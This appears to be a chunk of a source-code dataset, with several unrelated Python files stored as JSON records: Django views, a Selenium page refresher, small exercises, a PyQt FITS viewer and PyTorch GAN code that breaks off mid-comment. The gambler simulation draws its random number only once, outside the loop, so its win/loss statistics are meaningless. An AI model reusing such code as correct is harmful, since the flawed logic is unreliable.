'delaccountbut' in request.POST:\n        del_form = Del_account_form(request.POST)\n        set_var = \"del\"\n        if del_form.is_valid(request.user):\n            request.user.delete()\n            return redirect('/CYL/accounts/login')\n    else:\n        del_form = Del_account_form()\n    return render(request, 'account_set.html', locals())\n\n# ############################# Interaction ##################################\n\n\n@login_required\ndef In_dat_box(request):\n    \"\"\" List the blocks or articles contained in a law code or box \"\"\"\n    slug = request.POST.get('slug', None)\n    box_type, box_id = slug.split(sep=\":\")\n    box_id = int(box_id)\n    if box_type == '1':\n        lqs = list(\n            LawArticle.objects.filter(law_code=box_id,\n                                      block_id__isnull=True).order_by('id'))\n        lqs += list(\n            CodeBlock.objects.filter(rank=1, law_code=box_id).order_by('id'))\n        Box = LawCode.objects.get(id=box_id)\n        listparents = []\n    else:\n        lqs = list(\n            LawArticle.objects.filter(block=box_id).order_by('id'))\n        lqs += list(\n            CodeBlock.objects.filter(block=box_id).order_by('id'))\n        Box = CodeBlock.objects.get(id=box_id)\n        listparents = []\n        lastbox = Box\n        while lastbox.rank != 1:\n            parent = lastbox.block\n            listparents.append((parent.title, parent.id, 2))\n            lastbox = parent\n        parent = Box.law_code\n        listparents.append((parent.title, parent.id, 1))\n        listparents.reverse()\n    intro = render_to_string('intro_InDatBox.html', locals())\n    content = render_to_string('content_InDatBox.html', locals())\n    ctx = {'intro': intro, 'content': content}\n    return JsonResponse(ctx)\n\n\n@login_required\ndef get_reflection(request):\n    \"\"\" View which displays a reflection and its child\n    reflections from its ID\"\"\"\n    # Does the reflection exist?\n    slug = request.POST.get('slug', None)\n    typeref, id_ref = slug.split(sep=\":\")\n    id_ref = int(id_ref)\n    try:\n        if typeref == 'loi':\n            ref = LawArticle.objects.get(id=id_ref)\n        elif typeref == 'qst':\n            ref = Question.objects.get(id=id_ref)\n        elif typeref == 'exp':\n            ref = Explaination.objects.get(id=id_ref)\n        elif typeref == 'dis':\n            ref = Disclaim.objects.get(id=id_ref)\n        elif typeref == 'opn':\n            ref = Opinion.objects.get(id=id_ref)\n        elif typeref == 'prp':\n            ref = Proposition.objects.get(id=id_ref)\n        else:\n            raise Http404\n    except Exception:\n        raise Http404\n    # where is it from? 
path to the reflection\n    if typeref == 'loi':\n        parent = ref.block\n        if parent is None:\n            listparents = []\n        else:\n            listparents = [(parent.title, parent.id, 2)]\n            while parent.rank != 1:\n                parent = parent.block\n                listparents.append((parent.title, parent.id, 2))\n        parent = ref.law_code\n        listparents.append((parent.title, parent.id, 1))\n        listparents.reverse()\n    # ######## elif typeref == 'prop'\n    else:\n        law_code, list_parents = get_path(ref)\n    \"\"\"\n    user_session = UserSession.objects.get(\n        session_id=request.session.session_key)\n    User = user_session.user\n    \"\"\"\n    User = request.user\n    # forms initializations\n    if request.method == 'POST' and 'btnqform' in request.POST:\n        qform = QuestionForm(request.POST)\n        if qform.is_valid():\n            qtitle = qform.cleaned_data['title']\n            question = qform.cleaned_data['text_q']\n            q = Question.objects.create(text_q=question,\n                                        title=qtitle,\n                                        autor=User,\n                                        content_object=ref)\n            q.save()\n    else:\n        qform = QuestionForm()\n    if request.method == 'POST' and 'btnexpform' in request.POST:\n        expform = ExplainationForm(request.POST)\n        if expform.is_valid():\n            exptitle = expform.cleaned_data['title']\n            explain = expform.cleaned_data['text_exp']\n            exp = Explaination.objects.create(title=exptitle,\n                                              text_exp=explain,\n                                              autor=User,\n                                              content_object=ref)\n            exp.save()\n    else:\n        expform = ExplainationForm()\n    if typeref == 'exp' or typeref == 'opn' or typeref == 'dis':\n        if request.method == 'POST' and 'btndisform' in request.POST:\n            disform = DisclaimForm(request.POST)\n            if disform.is_valid():\n                distitle = disform.cleaned_data['title']\n                distext = disform.cleaned_data['text_dis']\n                disc = Disclaim.objects.create(title=distitle,\n                                               text_dis=distext,\n                                               autor=User,\n                                               content_object=ref)\n        else:\n            disform = DisclaimForm()\n    if typeref == 'loi' or typeref == 'prp':\n        if request.method == 'POST' and 'btnopform' in request.POST:\n            opform = OpinionForm(request.POST)\n            if opform.is_valid():\n                pos = opform.cleaned_data['positive']\n                optitle = opform.cleaned_data['title']\n                opin = opform.cleaned_data['text_op']\n                op = Opinion.objects.create(text_op=opin,\n                                            title=optitle,\n                                            positive=pos,\n                                            autor=User,\n                                            content_object=ref)\n                op.save()\n        else:\n            opform = OpinionForm()\n        if request.method == 'POST' and 'propform' in request.POST:\n            propform = PropositionForm(request.POST)\n            if propform.is_valid():\n                proptitle = propform.cleaned_data['title']\n                prop = propform.cleaned_data['text_prop']\n                if isinstance(ref, LawArticle):\n                    lawart = ref\n                else:\n                    lawart = ref.law_article\n                prp = Proposition.objects.create(text_prop=prop,\n                                                 title=proptitle,\n                                                 autor=User,\n                                                 law_article=lawart,\n                                                 content_object=ref)\n\n                prp.save()\n        else:\n            propform = PropositionForm()\n\n    # load all the disclaims, other propositions, opinions, comments and\n    # questions about the reflection\n    listexplainations = list(ref.explainations.all())\n    listquestions = list(ref.questions.all())\n    if typeref == 'exp' or typeref == 'opn' or typeref == 'dis':\n        listdisclaims = list(ref.disclaims.all())\n    if typeref == 'loi' or typeref == 'prp':\n        listposop = list(ref.opinions.filter(positive=True))\n        listnegop = list(ref.opinions.filter(positive=False))\n        listpropositions = list(ref.propositions.all())\n    intro = render_to_string('intro_reflec.html', locals())\n    content = render_to_string('content_reflec.html', locals())\n    ctx = {'intro': intro, 'content': content}\n    return JsonResponse(ctx)\n\n\ndef PostAProp(request):  # TODO: find a way to get ID_ref\n    typeref = request.POST.get('typeref', '')\n    idref = 
request.POST.get('ref_id', '')\n    if typeref == 'prp':\n        ref = Proposition.objects.get(\n            id=idref\n        )\n    else:\n        ref = LawArticle.objects.get(\n            id=idref\n        )\n    if request.method == 'POST':\n        propform = PropositionForm(request.POST)\n        if propform.is_valid():\n            proptitle = propform.cleaned_data['title']\n            prop = propform.cleaned_data['text_prop']\n            if isinstance(ref, LawArticle):\n                lawart = ref\n            else:\n                lawart = ref.law_article\n            prp = Proposition.objects.create(text_prop=prop,\n                                             title=proptitle,\n                                             autor=request.user,\n                                             law_article=lawart,\n                                             content_object=ref)\n            prp.save()\n    else:\n        propform = PropositionForm()\n    listpropositions = list(ref.propositions.all())\n    NewPropSection = render_to_string('UpPropSection.html', locals())\n    ctx = {'proposition': NewPropSection}\n    return JsonResponse(ctx)\n\n\n@login_required\ndef list_of_reflections(request, parent_type, parent_id, list_ref_type):\n    \"\"\" display the list of a given reflection type from the parent obj.\n    ex: list of the questions asked about law article X.\"\"\"\n    parent = get_the_instance(parent_type, parent_id)\n    if list_ref_type == 'qst':\n        list_to_display = list(parent.questions.all())\n    elif list_ref_type == 'exp':\n        list_to_display = list(parent.explainations.all())\n    elif list_ref_type == 'dis':\n        list_to_display = list(parent.disclaims.all())\n    elif list_ref_type == 'opv':\n        list_to_display = list(parent.opinions.filter(positive=True))\n        positif = True\n    elif list_ref_type == 'opx':\n        list_to_display = list(parent.opinions.filter(positive=False))\n        positif = False\n    elif list_ref_type == 'prp':\n        list_to_display = list(parent.propositions.all())\n    return render(request, 'displaylist.html', locals())\n\n\n@login_required\ndef create_new_article(request):\n    \"\"\" View to create a new article \"\"\"\n    pass\n\n\n@login_required\ndef create_new_box(request):\n    \"\"\" View to create a new Law Code or codeblock \"\"\"\n    pass\n","sub_path":"democratos/CreateYourLaws/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
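The UP and DOWN views above enforce one-vote-per-user semantics with a generic Note model and Django's ContentType framework. A condensed standalone sketch of that pattern, assuming the Note model from the module above; the helper name set_vote is illustrative, not part of the original code:

from django.contrib.contenttypes.models import ContentType


def set_vote(user, obj, approve):
    # One Note per (user, object); get_or_create enforces the single-vote rule.
    ct = ContentType.objects.get_for_model(obj)
    note, created = Note.objects.get_or_create(user=user,
                                               content_type=ct,
                                               object_id=obj.id)
    already = (not created) and note.approve == approve
    note.approve = approve
    note.save()
    return already  # True when the user had already voted this way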
-1","sub_path":"binary_search/33_rotated_array.py","file_name":"33_rotated_array.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"145726385","text":"from selenium import webdriver\nimport time\nx=raw_input(\"Enter the URL\")\nrefreshrate=raw_input(\"Enter the number of seconds\")\nrefreshrate=int(refreshrate)\ndriver = webdriver.Firefox()\ndriver.get(\"http://\"+x)\nwhile True:\n\ttime.sleep(refreshrate)\n\tdriver.refresh()\n","sub_path":"refresh.py","file_name":"refresh.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"64569094","text":"#nomor 4\ndef kelipatan(a):\n for i in range(1,a+1):\n if i % 3 == 0 and i % 7 == 0:\n print(\"Arkademy\",end=\", \")\n elif i % 3 == 0 :\n print(\"Arka\", end=\", \")\n elif i % 7 == 0 :\n print(\"Demy\", end=\", \")\n else:\n print(i, end=\", \")\n \nkelipatan(21)\n","sub_path":"nomor_4.py","file_name":"nomor_4.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409052219","text":"\r\n# Print Number of Wins and Percentage of Win and Loss o f a gambler\r\n\r\nimport random\r\n\r\nstake = int(input(\"Enter the Stake\\n\"))\r\ngoal = int(input(\"Enter the goal\\n\"))\r\ntime = int(input(\"Enter the number times\\n\"))\r\nbet = 0\r\nloss = 0\r\nwin = 0\r\nn = random.randint(0, 1)\r\nfor i in range(time):\r\n cash = stake\r\n while (cash != goal) and (cash != 0):\r\n bet += 1 # each time he wil place a bet until he reaches his goal\r\n if n < 0.5:\r\n cash += 1\r\n else:\r\n cash -= 1\r\n if cash == goal: # gambler wins if he reaches its goal else loose\r\n win += 1\r\n else:\r\n loss += 1\r\nprint(\"total number of wins\", win)\r\nprint(\"total number of loss\", loss)\r\nprint(\"persantage of wins\", (win / (win+loss)) * 100)\r\nprint(\"persantage of loss\", (loss / (win+loss)) * 100)\r\n","sub_path":"FunctionalPrograms/GamblerProg.py","file_name":"GamblerProg.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534921454","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nimport numpy as np\nfrom PyQt5.QtCore import pyqtSignal\nfrom astropy.wcs import WCS\nimport astropy.units as u\nimport matplotlib.pyplot as plt\nfrom astropy.wcs.utils import pixel_to_skycoord\nfrom matplotlib import colors\nfrom matplotlib.cm import ScalarMappable\nfrom skimage.transform import resize\n\nfrom .fitswidget import Ui_FitsWidget\nfrom .norm import *\n\n\nclass ProcessThread(QtCore.QThread):\n \"\"\"Worker thread for processing images and all display options applied to them.\"\"\"\n\n \"\"\"Signal emitted when the image is readily processed.\"\"\"\n imageReady = pyqtSignal(QtGui.QImage)\n\n def __init__(self, method, *args, **kwargs):\n \"\"\"Init a new worker thread.\n\n Args:\n method: Method to run in thread.\n \"\"\"\n QtCore.QThread.__init__(self, *args, **kwargs)\n self.method = method\n\n def run(self):\n \"\"\"Run method in thread.\"\"\"\n\n # run method and receive processed image\n image = self.method()\n\n # emit signal with image\n self.imageReady.emit(image)\n\n\nclass QFitsWidget(QtWidgets.QWidget, Ui_FitsWidget):\n \"\"\"PyQt Widget for displaying FITS images.\"\"\"\n\n \"\"\"Signal emitted when new cuts have been calculated.\"\"\"\n calculatedCuts = pyqtSignal(int, int)\n\n 
{"seq_id":"534921454","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nimport numpy as np\nfrom PyQt5.QtCore import pyqtSignal\nfrom astropy.wcs import WCS\nimport astropy.units as u\nimport matplotlib.pyplot as plt\nfrom astropy.wcs.utils import pixel_to_skycoord\nfrom matplotlib import colors\nfrom matplotlib.cm import ScalarMappable\nfrom skimage.transform import resize\n\nfrom .fitswidget import Ui_FitsWidget\nfrom .norm import *\n\n\nclass ProcessThread(QtCore.QThread):\n    \"\"\"Worker thread for processing images and all display options applied to them.\"\"\"\n\n    # Signal emitted when the image is readily processed.\n    imageReady = pyqtSignal(QtGui.QImage)\n\n    def __init__(self, method, *args, **kwargs):\n        \"\"\"Init a new worker thread.\n\n        Args:\n            method: Method to run in thread.\n        \"\"\"\n        QtCore.QThread.__init__(self, *args, **kwargs)\n        self.method = method\n\n    def run(self):\n        \"\"\"Run method in thread.\"\"\"\n\n        # run method and receive processed image\n        image = self.method()\n\n        # emit signal with image\n        self.imageReady.emit(image)\n\n\nclass QFitsWidget(QtWidgets.QWidget, Ui_FitsWidget):\n    \"\"\"PyQt Widget for displaying FITS images.\"\"\"\n\n    # Signal emitted when new cuts have been calculated.\n    calculatedCuts = pyqtSignal(int, int)\n\n    def __init__(self, parent=None):\n        \"\"\"Init new widget.\"\"\"\n        QtWidgets.QWidget.__init__(self, parent)\n        self.setupUi(self)\n\n        # mouse\n        self.imageView.mouseMoved.connect(self._mouse_moved)\n\n        # set cuts\n        self.comboCuts.addItems(['100.0%', '99.9%', '99.0%', '95.0%', 'Custom'])\n        self.comboCuts.setCurrentText('99.9%')\n\n        # set stretch functions\n        self.comboStretch.addItems(['linear', 'log', 'sqrt', 'squared', 'asinh'])\n        self.comboStretch.setCurrentText('sqrt')\n\n        # set colormaps\n        self.comboColormap.addItems(sorted([cm for cm in plt.colormaps() if not cm.endswith('_r')]))\n        self.comboColormap.setCurrentText('gray')\n        self._colormap_changed()\n\n        # store hdu and (scaled) data\n        self.hdu = None\n        self.data = None\n        self.trimmed_data = None\n        self.sorted_data = None\n        self.scaled_data = None\n        self.pixmap = None\n        self.cuts = None\n        self.wcs = None\n        self.position_angle = None\n        self.mirrored = None\n        self.thread = None\n\n        # connect signals/slots that start threads\n        self.comboCuts.currentTextChanged.connect(lambda: self._run_in_thread(self._evaluate_cuts_preset))\n        self.spinLoCut.valueChanged.connect(lambda: self._run_in_thread(self._apply_cuts))\n        self.spinHiCut.valueChanged.connect(lambda: self._run_in_thread(self._apply_cuts))\n        self.checkTrimSec.stateChanged.connect(lambda: self._run_in_thread(self._trim_image))\n\n        # and now all the others\n        self.comboStretch.currentTextChanged.connect(self._colormap_changed)\n        self.comboColormap.currentTextChanged.connect(self._colormap_changed)\n        self.checkColormapReverse.stateChanged.connect(self._colormap_changed)\n        self.calculatedCuts.connect(self._update_cuts_gui)\n\n    def display(self, hdu):\n        \"\"\"Display image from given HDU.\n\n        Args:\n            hdu: HDU to show image from.\n        \"\"\"\n\n        # check supported formats\n        if len(hdu.data.shape) == 2:\n            # any 2D image is supported\n            pass\n        elif len(hdu.data.shape) == 3:\n            # we need three images of uint8 format\n            if hdu.data.shape[0] != 3:\n                raise ValueError('Data cubes only supported with three layers, which are interpreted as RGB.')\n\n        # store HDU and create WCS\n        self.hdu = hdu\n        self.wcs = WCS(hdu.header)\n\n        # get position angle and check whether image was mirrored\n        if 'PC1_1' in self.hdu.header:\n            CD11, CD12 = self.hdu.header['PC1_1'], self.hdu.header['PC1_2']\n            CD21, CD22 = self.hdu.header['PC2_1'], self.hdu.header['PC2_2']\n            self.position_angle = np.degrees(np.arctan2(CD12, CD11))\n            self.mirrored = (CD11 * CD22 - CD12 * CD21) < 0\n        else:\n            self.position_angle = None\n            self.mirrored = None\n\n        # do we have a bayer matrix given?\n        if 'BAYERPAT' in self.hdu.header or 'COLORTYP' in self.hdu.header:\n            # got a bayer pattern\n            pattern = self.hdu.header['BAYERPAT' if 'BAYERPAT' in self.hdu.header else 'COLORTYP']\n\n            # debayer image\n            self.data = self._debayer(self.hdu.data, pattern)\n\n        else:\n            # just take data\n            self.data = self.hdu.data\n\n        # for 8-bit images, we don't need cuts\n        is_int8 = self.data.dtype == np.uint8\n\n        # colour image?\n        is_color = len(self.data.shape) == 3 and self.data.shape[0] == 3\n\n        # enable GUI elements, only important for first image after start\n        self.labelCuts.setEnabled(not is_int8)\n        self.comboCuts.setEnabled(not is_int8)\n        self.spinLoCut.setEnabled(not is_int8)\n        self.spinHiCut.setEnabled(not is_int8)\n        self.labelStretch.setEnabled(not is_int8)\n        self.comboStretch.setEnabled(not is_int8)\n        self.labelColormap.setEnabled(not is_color)\n        self.comboColormap.setEnabled(not is_color)\n        self.checkColormapReverse.setEnabled(not is_color)\n        
self.checkTrimSec.setEnabled(True)\n\n        # apply trimsec, run in thread\n        self._run_in_thread(self._trim_image)\n\n    def _run_in_thread(self, method):\n        \"\"\"Run the given method in a thread.\n\n        Args:\n            method: Method to run.\n        \"\"\"\n\n        # only one thread at a time\n        if self.thread is not None and self.thread.isRunning():\n            raise ValueError('Thread already running.')\n\n        # disable widget and show wait cursor\n        self.setEnabled(False)\n        QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)\n\n        # create and start thread\n        self.thread = ProcessThread(method)\n        self.thread.imageReady.connect(self._show_image)\n        self.thread.start()\n\n    def _show_image(self, image):\n        \"\"\"Called when the ProcessThread finishes processing an image.\n\n        Args:\n            image: Processed image.\n        \"\"\"\n\n        # now we need to display it\n        self.imageView.setImage(image, self.position_angle, self.mirrored)\n\n        # update info\n        x, y = self.imageView.last_cursor_pos\n        self._mouse_moved(x, y)\n\n        # restore mouse cursor and enable widget\n        QtWidgets.QApplication.restoreOverrideCursor()\n        self.setEnabled(True)\n\n    def _trim_image(self):\n        \"\"\"Trim image and sort data for calculating cuts.\n\n        Returns:\n            Processed image.\n        \"\"\"\n\n        # cut trimsec\n        self.trimmed_data = self._trimsec(self.hdu, self.data) if self.checkTrimSec.isChecked() else self.data\n\n        # store flattened and sorted pixels\n        self.sorted_data = np.sort(self.trimmed_data[self.trimmed_data > 0].flatten())\n\n        # image type?\n        if self.trimmed_data.dtype == np.uint8:\n            # image is scaled image directly\n            self.scaled_data = self.trimmed_data.copy()\n            return self._create_qimage()\n\n        else:\n            # apply cuts\n            return self._evaluate_cuts_preset()\n\n    def _evaluate_cuts_preset(self):\n        \"\"\"When the cuts preset has changed, calculate the new cuts\"\"\"\n\n        # get preset\n        preset = self.comboCuts.currentText()\n        if preset == 'Custom':\n            # just enable text boxes\n            self.spinLoCut.setEnabled(True)\n            self.spinHiCut.setEnabled(True)\n            return self._apply_cuts()\n\n        # get percentage\n        percent = float(preset[:-1])\n\n        # get number of pixels to discard at both ends\n        n = int(len(self.sorted_data) * (1. - (percent / 100.)))\n\n        # get min/max in cut range\n        cut = self.sorted_data[n:-n] if n > 0 else self.sorted_data\n        cuts = (np.min(cut), np.max(cut))\n\n        # update gui\n        # we need to do this via a signal, since this method is always run from a different thread\n        self.calculatedCuts.emit(cuts[0], cuts[1])\n\n        # apply cuts\n        return self._apply_cuts(cuts)\n\n    def _update_cuts_gui(self, lo, hi):\n        \"\"\"Update current cuts shown in GUI.\n\n        Args:\n            lo: Low cut.\n            hi: High cut.\n        \"\"\"\n\n        # disable signals\n        self.spinLoCut.blockSignals(True)\n        self.spinHiCut.blockSignals(True)\n\n        # set them and disable text boxes\n        self.spinLoCut.setValue(lo)\n        self.spinLoCut.setEnabled(False)\n        self.spinHiCut.setValue(hi)\n        self.spinHiCut.setEnabled(False)\n\n        # re-enable signals\n        self.spinLoCut.blockSignals(False)\n        self.spinHiCut.blockSignals(False)\n\n    def _apply_cuts(self, cuts=None):\n        \"\"\"Apply cuts to image.\n\n        Args:\n            cuts: Cuts to apply. 
If None, take from GUI.\n\n        Returns:\n            Processed image.\n        \"\"\"\n\n        # get them\n        if cuts is None:\n            cuts = (self.spinLoCut.value(), self.spinHiCut.value())\n\n        # did they change?\n        if self.cuts != cuts:\n            # store and apply\n            self.cuts = cuts\n            c1, c2 = self.cuts\n\n            # scale data\n            data = (self.data - c1) / (c2 - c1)\n\n            # trim\n            data[data < 0] = 0\n            data[data > 1] = 1\n\n            # back to unsigned 8-bit\n            data *= 255\n            self.scaled_data = np.uint8(data)\n\n        # now we need to re-create the pixmap\n        return self._create_qimage()\n\n    def _create_qimage(self):\n        \"\"\"Create a QImage from the data.\n\n        Returns:\n            Processed image.\n        \"\"\"\n\n        # get shape of image\n        height, width = self.data.shape[-2:]\n\n        # format\n        if len(self.scaled_data.shape) == 2:\n            # plain and simple B/W\n            format = QtGui.QImage.Format_Indexed8\n            bytes_per_line = self.data.shape[1]\n\n        else:\n            # 3D, i.e. cube, with colour information\n            format = QtGui.QImage.Format_RGB888\n            bytes_per_line = self.data.shape[2] * 3\n\n        # for cubes, move axis\n        # this is necessary, because in FITS we store three different images, i.e. sth like RRRRRGGGGGBBBBB,\n        # but we need RGBRGBRGBRGBRGB\n        data = np.moveaxis(self.scaled_data, 0, 2) if len(self.scaled_data.shape) == 3 else self.scaled_data\n\n        # create QImage\n        image = QtGui.QImage(data.tobytes(), width, height, bytes_per_line, format)\n\n        # flip and return it\n        flipped = image.transformed(QtGui.QTransform().scale(1, -1))\n        return flipped\n\n    def _mouse_moved(self, x: float, y: float):\n        \"\"\"Called, whenever the mouse is moved.\n\n        Args:\n            x: X position of mouse\n            y: Y position of mouse\n        \"\"\"\n\n        # show X/Y\n        self.textImageX.setText('%.3f' % x)\n        self.textImageY.setText('%.3f' % (self.scaled_data.shape[-2] - y,))\n\n        # convert to RA/Dec and show it\n        try:\n            coord = pixel_to_skycoord(x, y, self.wcs)\n            self.textWorldRA.setText(coord.ra.to_string(u.hour, sep=':'))\n            self.textWorldDec.setText(coord.dec.to_string(sep=':'))\n        except ValueError:\n            self.textWorldRA.clear()\n            self.textWorldDec.clear()\n\n        # get value\n        try:\n            iy, ix = self.hdu.data.shape[-2] - int(y), int(x)\n            value = self.hdu.data[iy, ix]\n        except IndexError:\n            value = ''\n        self.textPixelValue.setText(str(value))\n\n        # mean/max\n        try:\n            # cut\n            if len(self.hdu.data.shape) == 2:\n                cut = self.hdu.data[iy - 10:iy + 11, ix - 10: ix + 11]\n            else:\n                cut = self.hdu.data[:, iy - 10:iy + 11, ix - 10: ix + 11]\n\n            # calculate and show\n            if all([s > 0 for s in cut.shape]):\n                self.textAreaMean.setText('%.2f' % np.mean(cut))\n                self.textAreaMax.setText('%.2f' % np.max(cut))\n            else:\n                self.textAreaMean.clear()\n                self.textAreaMax.clear()\n\n        except ValueError:\n            # outside range\n            pass\n\n        # get zoom in and scale it to 100x100\n        pix = self.imageView.cut(x, y, 10).scaled(101, 101)\n\n        # draw central pixel\n        painter = QtGui.QPainter(pix)\n        painter.setPen(QtGui.QPen(QtCore.Qt.white, 1))\n        painter.drawRect(48, 48, 4, 4)\n        painter.setPen(QtGui.QPen(QtCore.Qt.black, 1))\n        painter.drawRect(47, 47, 6, 6)\n        painter.end()\n\n        # show zoom\n        self.labelZoom.setPixmap(pix)\n\n    def _colormap_changed(self):\n        \"\"\"Called, when colormap is changed.\"\"\"\n\n        # get name of colormap\n        name = self.comboColormap.currentText()\n        if self.checkColormapReverse.isChecked():\n            name += '_r'\n\n        # get normalization\n        stretch = self.comboStretch.currentText()\n        if stretch == 'linear':\n            norm = colors.Normalize(vmin=0, vmax=250)\n        elif stretch == 'log':\n            norm = colors.LogNorm(vmin=0.1, vmax=250)\n        elif stretch == 'sqrt':\n            norm = FuncNorm(np.sqrt, vmin=0, vmax=250)\n        elif stretch == 
'squared':\n            norm = colors.PowerNorm(2, vmin=0, vmax=250)\n        elif stretch == 'asinh':\n            norm = FuncNorm(np.arcsinh, vmin=0, vmax=250)\n        else:\n            raise ValueError('Invalid stretch')\n\n        # get colormap\n        cm = ScalarMappable(norm=norm, cmap=plt.get_cmap(name))\n\n        # set it\n        self.imageView.setColormap(cm)\n\n        # create colorbar image\n        colorbar = QtGui.QImage(1, 256, QtGui.QImage.Format_ARGB32)\n        for i in range(256):\n            rgba = cm.to_rgba(i, bytes=True)\n            c = QtGui.QColor(*rgba)\n            colorbar.setPixelColor(0, i, c)\n\n        # set colorbar\n        self.labelColorbar.setPixmap(QtGui.QPixmap(colorbar))\n\n    def _trimsec(self, hdu, data=None) -> np.ndarray:\n        \"\"\"Trim an image to TRIMSEC.\n\n        Args:\n            hdu: HDU to take data from.\n            data: If given, take this instead of data from HDU.\n\n        Returns:\n            Numpy array with image data.\n        \"\"\"\n\n        # no data?\n        if data is None:\n            data = self.hdu.data.copy()\n\n        # keyword not given?\n        if 'TRIMSEC' not in hdu.header:\n            # return whole data\n            return data\n\n        # get value of section\n        sec = hdu.header['TRIMSEC']\n\n        # split values\n        s = sec[1:-1].split(',')\n        x = s[0].split(':')\n        y = s[1].split(':')\n\n        # zero out everything outside the trim section\n        x0 = int(x[0]) - 1\n        x1 = int(x[1])\n        y0 = int(y[0]) - 1\n        y1 = int(y[1])\n        data[:, :x0] = 0\n        data[:, x1:] = 0\n        data[:y0, :] = 0\n        data[y1:, :] = 0\n\n        # return data\n        return data\n\n    def _debayer(self, arr: np.ndarray, pattern: str) -> np.ndarray:\n        \"\"\"Debayer an image\"\"\"\n\n        # what pattern do we have?\n        if pattern == 'GBRG':\n            # pattern is: GB\n            #             RG\n            R = arr[1::2, 0::2]\n            G = arr[0::2, 0::2] // 2 + arr[1::2, 1::2] // 2\n            B = arr[0::2, 1::2]\n\n        else:\n            raise ValueError('Unknown Bayer pattern.')\n\n        # return rescaled cube\n        return np.array([resize(a, arr.shape, anti_aliasing=False) for a in [R, G, B]])\n\n\n__all__ = ['QFitsWidget']\n","sub_path":"qfitswidget/qfitswidget.py","file_name":"qfitswidget.py","file_ext":"py","file_size_in_byte":15582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
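The cut presets above sort every positive pixel and discard n values from each end before taking min/max. numpy's percentile function gives similar lo/hi cuts without materialising the sorted array; a sketch with made-up data, clipping (100 - percent)/2 from each tail:

import numpy as np

data = np.random.default_rng(0).normal(1000.0, 50.0, (512, 512))
percent = 99.9  # same convention as the '99.9%' preset above
lo, hi = np.percentile(data, [(100 - percent) / 2, 100 - (100 - percent) / 2])
scaled = np.clip((data - lo) / (hi - lo), 0, 1)  # then * 255 for display
print(lo, hi, scaled.dtype)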
\"🇭\",\n \"i\" : \"🇮\",\n \"j\" : \"🇯\",\n \"k\" : \"🇰\",\n \"l\" : \"🇱\",\n \"m\" : \"🇲\",\n \"n\" : \"🇳\",\n \"o\" : \"🇴\",\n \"p\" : \"🇵\",\n \"q\" : \"🇶\",\n \"r\" : \"🇷\",\n \"s\" : \"🇸\",\n \"t\" : \"🇹\",\n \"u\" : \"🇺\",\n \"v\" : \"🇻\",\n \"w\" : \"🇼\",\n \"x\" : \"🇽\",\n \"y\" : \"🇾\",\n \"z\" : \"🇿\"\n}\n\n# Checks for double letters\ndef is_valid_word(word):\n retval = True\n letters = []\n for letter in word:\n if letter not in letters:\n letters.append(letter)\n else:\n retval = False\n\n return retval\n\ndef add_emoji_reaction(word):\n emoji_list = []\n if is_valid_word(word):\n for letter in word:\n emoji_list.append(emoji_dict[letter])\n emoji_list.append(\"❗\")\n \n return emoji_list\n","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"200454398","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Module\nfrom torch.autograd import Variable\nimport numpy as np\nfrom collections import OrderedDict\nfrom . import densenet_efficient as dens\nfrom . import time_frequence as tf\n\n###############################################################################\n# Functions\n###############################################################################\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1 or classname.find(\n 'InstanceNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_norm_layer(norm_type):\n if norm_type == 'batch':\n norm_layer = nn.BatchNorm2d\n elif norm_type == 'instance':\n norm_layer = nn.InstanceNorm2d\n else:\n print('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n # return None\n\n\ndef define_G(n_fft, hop, gpu_ids=[]):\n netG = None\n use_gpu = len(gpu_ids) > 0\n\n if use_gpu:\n assert (torch.cuda.is_available())\n\n netG = nn.DataParallel(AuFCN(n_fft, hop))\n\n if len(gpu_ids) > 0:\n netG.cuda(device=gpu_ids[0])\n netG.apply(weights_init)\n return netG\n\n\ndef define_D(input_nc,\n ndf,\n which_model_netD,\n n_layers_D=3,\n norm='batch',\n use_sigmoid=False,\n gpu_ids=[]):\n netD = None\n use_gpu = len(gpu_ids) > 0\n norm_layer = get_norm_layer(norm_type=norm)\n\n if use_gpu:\n assert (torch.cuda.is_available())\n if which_model_netD == 'basic':\n netD = NLayerDiscriminator(\n input_nc,\n ndf,\n n_layers=3,\n norm_layer=norm_layer,\n use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'n_layers':\n netD = NLayerDiscriminator(\n input_nc,\n ndf,\n n_layers_D,\n norm_layer=norm_layer,\n use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n else:\n print('Discriminator model name [%s] is not recognized' %\n which_model_netD)\n if use_gpu:\n netD.cuda(device_id=gpu_ids[0])\n netD.apply(weights_init)\n return netD\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\n\n# Defines the GAN loss which uses either LSGAN or the regular GAN.\n# When LSGAN is used, it is basically same as MSELoss,\n# but it abstracts away the need to create the target label tensor\n# that has the same size as 
